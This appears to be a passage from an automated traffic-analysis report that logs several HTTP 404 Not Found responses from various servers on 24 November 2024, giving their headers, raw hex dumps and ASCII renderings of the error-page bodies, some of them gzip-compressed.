                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100cache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Sun, 24 Nov 2024 07:35:24 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100cache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Sun, 24 Nov 2024 07:35:27 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100cache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Sun, 24 Nov 2024 07:35:29 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 24 Nov 2024 07:35:45 GMTContent-Type: text/htmlContent-Length: 479Connection: closeETag: "651a865d-1df"Server: cdnX-Cache-Status: MISSData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 3e 0a 09 62 6f 64 79 7b 0a 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 34 34 3b 0a 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 0a 09 7d 0a 09 68 33 7b 0a 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 36 30 70 78 3b 0a 09 09 63 6f 6c 6f 72 3a 23 65 65 65 3b 0a 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 0a 09 09 70 61 64 64 69 6e 67 2d 74 6f 70 3a 33 30 70 78 3b 0a 09 09 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61 6c 3b 0a 09 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 3c 68 33 3e 34 30 34 ef bc 8c e6 82 a8 e8 af b7 e6 b1 82 e7 9a 84 e6 96 87 e4 bb b6 e4 b8 8d e5 ad 98 e5 9c a8 21 3c 2f 68 33 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!doctype html><html><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no"><title>404</title><style>body{background-color:#444;font-size:14px;}h3{font-size:60px;color:#eee;text-align:center;padding-top:30px;font-weight:normal;}</style></head><body><h3>404!</h3></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 24 Nov 2024 07:36:08 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachex-turbo-charged-by: LiteSpeedcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qI%2FFZtvzqyw6tju3SWm6I5iqKM99PTyN1F1rg1QMZKzrQne0S9XGAbMUVGx5GTMcakOrWtxU3fiEmaBooDGemoP5cgF95Rw4yYkTbM%2BL%2By1ClT09gWfTCMQS9CLobxBX%2BR7woSojiWw5"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e77b9eb5b356a57-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1688&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=740&delivery_rate=0&cwnd=229&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 32 63 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 64 54 ed 8a db 3a 10 fd 1f e8 3b cc 7a 29 74 21 de c8 59 87 16 db 31 2d fd a0 17 4a ef 42 17 2e fd 29 5b e3 68 58 59 72 a5 89 93 b4 f4 dd 2f 72 92 fd 68 35 20 4b e3 33 a3 99 33 23 55 17 1f fe 7d 7f f7 fd f6 23 68 ee 4d 3d ab e2 07 02 1f 0c ae 13 8d b4 d1 5c 64 42 bc 4c e2 2f 94 aa 9e 55 3d b2 04 2b 7b 5c 27 23 e1 6e 70 9e 13 68 9d 65 b4 bc 4e 76 a4 58 af 15 8e d4 62 3a 6d e6 40 96 98 a4 49 43 2b 0d ae b3 39 04 ed c9 de a7 ec d2 8e 78 6d 5d 02 8b 7a 56 31 b1 c1 1a 72 91 c3 57 c7 f0 c9 6d ad 7a 31 ab 16 47 7d 35 05 55 bf ed 51 91 84 57 83 c7 0e 7d 48 5b 67 9c 4f 43 ab b1 c7 42 49 7f 7f f5 ab 71 ea f0 ab 91 ed fd c6 47 17 47 48 71 29 84 b8 a0 3e 86 2b 2d ff fe 5d 2d 8e 0e ab c5 29 af 68 76 ce fc 68 02 97 79 9e 97 d0 4b bf 21 5b 88 b2 73 96 0b b0 ce f7 d2 40 96 0f fb c5 52 0c 7b 78 e7 49 9a 39 7c 46 33 22 53 2b e7 10 a4 0d 69 40 4f 5d 09 4f 48 2c e1 af a8 e0 b2 eb ba 32 b2 ab 68 fc 83 77 b9 65 57 42 4f 36 7d e6 23 a9 21 8e a7 06 8c 7b 4e a5 a1 8d 2d a0 45 cb e8 4b Data Ascii: 2cddT:;z)t!Y1-JB.)[hXYr/rh5 K33#U}#hM=\dBL/U=+{\'#npheNvXb:m@IC+9xm]zV1rWmz1G}5UQW}H[gOCBIqGGHq)>+-]-)hvhyK![s@R{xI9|F3"S+i@O]OH,2hweWBO6}#!{N-EK
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 24 Nov 2024 07:36:11 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachex-turbo-charged-by: LiteSpeedcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kSkx2FhE7dBH3OWiky2Oayu7vTWLQCkaANK5jgKQtMQXwDRrYBfd62%2BDuwmeuCL%2FXmnAy5ZSB9nRVsTySOTU65dFlf8us3PXiDxtk0UO0Lxffo2rkXfS9cgK6z4Y41cU5TBMkC5FClxe"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e77b9fc2bb8c346-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1686&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=760&delivery_rate=0&cwnd=178&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 32 64 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 64 54 ed 8a db 3a 10 fd 1f e8 3b cc 7a 29 74 21 de c8 59 87 16 db 31 2d fd a0 17 4a ef 42 17 2e fd 29 5b e3 68 58 59 72 a5 89 93 b4 f4 dd 2f 72 92 fd 68 35 20 4b e3 33 a3 99 33 23 55 17 1f fe 7d 7f f7 fd f6 23 68 ee 4d 3d ab e2 07 02 1f 0c ae 13 8d b4 d1 5c 64 42 bc 4c e2 2f 94 aa 9e 55 3d b2 04 2b 7b 5c 27 23 e1 6e 70 9e 13 68 9d 65 b4 bc 4e 76 a4 58 af 15 8e d4 62 3a 6d e6 40 96 98 a4 49 43 2b 0d ae b3 39 04 ed c9 de a7 ec d2 8e 78 6d 5d 02 8b 7a 56 31 b1 c1 1a 72 91 c3 57 c7 f0 c9 6d ad 7a 31 ab 16 47 7d 35 05 55 bf ed 51 91 84 57 83 c7 0e 7d 48 5b 67 9c 4f 43 ab b1 c7 42 49 7f 7f f5 ab 71 ea f0 ab 91 ed fd c6 47 17 47 48 71 29 84 b8 a0 3e 86 2b 2d ff fe 5d 2d 8e 0e ab c5 29 af 68 76 ce fc 68 02 97 79 9e 97 d0 4b bf 21 5b 88 b2 73 96 0b b0 ce f7 d2 40 96 0f fb c5 52 0c 7b 78 e7 49 9a 39 7c 46 33 22 53 2b e7 10 a4 0d 69 40 4f 5d 09 4f 48 2c e1 af a8 e0 b2 eb ba 32 b2 ab 68 fc 83 77 b9 65 57 42 4f 36 7d e6 23 a9 21 8e a7 06 8c 7b 4e a5 a1 8d 2d a0 45 cb e8 4b 98 b8 2f de Data Ascii: 2d8dT:;z)t!Y1-JB.)[hXYr/rh5 K33#U}#hM=\dBL/U=+{\'#npheNvXb:m@IC+9xm]zV1rWmz1G}5UQW}H[gOCBIqGGHq)>+-]-)hvhyK![s@R{xI9|F3"S+i@O]OH,2hweWBO6}#!{N-EK/
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 24 Nov 2024 07:36:13 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachex-turbo-charged-by: LiteSpeedcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=r3nEfo0nDxmkXvQ2Yvt3miIdHOcV059kkDYAPKMg9Zzdyrfd9kMOtAvrxyDbMbsw2KICV1PHK3aTB52mM%2BT8Cjs%2FBuU6slLLVPRhJGX4T5eiWs7Nk92qPjhfran3%2Ftd%2FHnOwuupv5YKn"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e77ba0d1f850c88-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1689&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1773&delivery_rate=0&cwnd=215&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 32 64 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 64 54 ed 8a db 3a 10 fd 1f e8 3b cc 7a 29 74 21 de c8 59 87 16 db 31 2d fd a0 17 4a ef 42 17 2e fd 29 5b e3 68 58 59 72 a5 89 93 b4 f4 dd 2f 72 92 fd 68 35 20 4b e3 33 a3 99 33 23 55 17 1f fe 7d 7f f7 fd f6 23 68 ee 4d 3d ab e2 07 02 1f 0c ae 13 8d b4 d1 5c 64 42 bc 4c e2 2f 94 aa 9e 55 3d b2 04 2b 7b 5c 27 23 e1 6e 70 9e 13 68 9d 65 b4 bc 4e 76 a4 58 af 15 8e d4 62 3a 6d e6 40 96 98 a4 49 43 2b 0d ae b3 39 04 ed c9 de a7 ec d2 8e 78 6d 5d 02 8b 7a 56 31 b1 c1 1a 72 91 c3 57 c7 f0 c9 6d ad 7a 31 ab 16 47 7d 35 05 55 bf ed 51 91 84 57 83 c7 0e 7d 48 5b 67 9c 4f 43 ab b1 c7 42 49 7f 7f f5 ab 71 ea f0 ab 91 ed fd c6 47 17 47 48 71 29 84 b8 a0 3e 86 2b 2d ff fe 5d 2d 8e 0e ab c5 29 af 68 76 ce fc 68 02 97 79 9e 97 d0 4b bf 21 5b 88 b2 73 96 0b b0 ce f7 d2 40 96 0f fb c5 52 0c 7b 78 e7 49 9a 39 7c 46 33 22 53 2b e7 10 a4 0d 69 40 4f 5d 09 4f 48 2c e1 af a8 e0 b2 eb ba 32 b2 ab 68 fc 83 77 b9 65 57 42 4f 36 7d e6 23 a9 21 8e a7 06 8c 7b 4e a5 a1 8d 2d a0 45 cb e8 Data Ascii: 2d8dT:;z)t!Y1-JB.)[hXYr/rh5 K33#U}#hM=\dBL/U=+{\'#npheNvXb:m@IC+9xm]zV1rWmz1G}5UQW}H[gOCBIqGGHq)>+-]-)hvhyK![s@R{xI9|F3"S+i@O]OH,2hweWBO6}#!{N-E
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 24 Nov 2024 07:36:16 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachex-turbo-charged-by: LiteSpeedcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NkmBSC1s5%2F4%2BdFkxwi5lfTkFrbdrxc%2FbcAg%2F3z3zV%2BJHrQDuJueHbVWctYsazP9vJI0CGvWcj%2FaotNYYVUuVPg52zX4WvcklN2qmTDocteTIlpxneu3%2BZcJxqgaCOLhHmL1lfMbNRHyT"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e77ba1d3c417c8a-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1937&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=465&delivery_rate=0&cwnd=235&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 34 65 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b Data Ascii: 4e2<!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 24 Nov 2024 07:36:22 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 82 77 18 0f 10 a2 d0 e5 90 8d 28 b8 d0 8d 27 48 9d 31 09 a4 93 12 23 d8 db 9b 6a 0b e2 da a5 ab 61 de cf c7 43 5f ba 68 96 0b f4 6c c9 60 09 25 b2 69 d6 0d 9c 52 81 7d ba 0b a1 7e 8b a8 5f 91 1a 6d 13 0d e3 bd b0 14 ce 06 fd e6 bb 51 15 d4 93 3d b2 6b 68 fa c4 05 79 7c 7a 7a a6 e9 79 c9 4a 29 b0 d0 5b a2 20 0e 4a 02 0a 37 db 46 86 e3 f9 b0 03 2b 04 5b 9f 53 c7 70 cd 81 85 e2 00 9c 73 ca b5 e1 18 94 fa 23 7e 8d 78 02 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data 